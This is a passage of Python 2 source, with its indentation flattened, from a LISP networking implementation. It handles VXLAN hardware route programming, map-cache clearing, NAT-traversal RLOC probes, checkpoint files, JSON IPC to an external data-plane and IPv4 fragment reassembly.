# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = commands.getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet. To be used as
# a handle to get VTEP's mac address. And then that VTEP's MAC address
# is a handle to tell VXLAN to encapsulate IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = commands.getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
# Derive MAC address from VTEP address an associate it with the next-hop
# address on vlan4094. This MAC address must be the MAC address on the
# foreign VTEP configure with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
octet1 = lisp_hex_string(rloc_octets[1]).zfill(2)
octet2 = lisp_hex_string(rloc_octets[2]).zfill(2)
octet3 = lisp_hex_string(rloc_octets[3]).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list, lisp_gleaned_groups
global lisp_no_map_request_rate_limit
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Clear rate-limiting temporarily.
#
lisp_no_map_request_rate_limit = lisp_get_timestamp()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Clear gleaned groups data structure.
#
lisp_gleaned_groups = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data encapsulated with a source-port of 4341
# and a destination adddress and port that was translated by the NAT. That
# information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface names of each next-hop for the IPv4 default in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = commands.getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = commands.getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = commands.getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_rlocs has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store encryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in lisp_myinterfaces.values():
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return a auth_key{} where the keys from the dictionary array are type
# integers and the values are type string.
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsualted packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
# Initialized list if first fragment. Indexed by IPv4 Ident.
#
if (lisp_reassembly_queue.has_key(ident) == False):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
# Do not queue fragment if first fragment arrived and we determined its
# not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
# IP header in the first fragment but remove in each other fragment.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<<port> or <addr>:0 in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
addr_str = addr.print_address_no_iid()
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
#
# We are at non-NAT based xTR. We need to get the keys from an RTR
# or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (lisp_rloc_probe_list.has_key(addr)): return(addr)
#
# Have to check NAT cache to see if RLOC is translated. If not, this
# is an xTR in public space. We'll have to change this in the future
# so we don't do a full table traversal. But this only happensu
#
for nat_info in lisp_nat_state_info.values():
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endif
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_set_ttl
#
# Set send IP TTL for outgoing packet.
#
def lisp_set_ttl(lisp_socket, ttl):
try:
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, ttl)
except:
lprint("socket.setsockopt(IP_TTL) not supported")
pass
#endtry
return
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9])[0] == 17)
if (udp == False): return([packet, None, None, None])
sport = struct.unpack("H", packet[20:22])[0]
dport = struct.unpack("H", packet[22:24])[0]
is_lisp = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
if (is_lisp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (commands.getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if (msg.has_key("entries") == False):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if (msg.has_key("eid-prefix") == False):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if (msg.has_key("instance-id") == False):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if (msg.has_key("rlocs") == False):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if (ipc_rloc.has_key("rloc") == False): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ipc_rloc.has_key("packet-count") == False else \
ipc_rloc["packet-count"]
bc = 0 if ipc_rloc.has_key("byte-count") == False else \
ipc_rloc["byte-count"]
ts = 0 if ipc_rloc.has_key("seconds-last-packet") == False else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If are an RTR, we can process the stats directly. If are an ITR we need
# to send an IPC message the the lisp-etr process.
#
